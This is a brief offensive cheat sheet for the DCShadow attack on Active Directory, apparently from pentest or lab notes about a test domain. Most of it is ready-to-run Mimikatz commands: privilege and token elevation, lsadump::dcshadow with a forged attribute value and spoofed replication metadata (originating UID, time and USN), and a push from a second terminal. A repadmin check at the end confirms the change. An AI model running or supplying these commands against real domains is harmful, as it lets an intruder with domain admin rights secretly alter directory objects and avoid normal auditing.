DC Shadow

# DC Shadow is a post compromission attack, allowing you to update replication metadata
# On a compromised client, using a domain admin account
# You can attack with Mimikatz

# Terminal 1 (runas)
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42

# Terminal 2 (runas)
mimikatz # lsadump::dcshadow /push

# You can check the success throught repadmin on the DC
repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"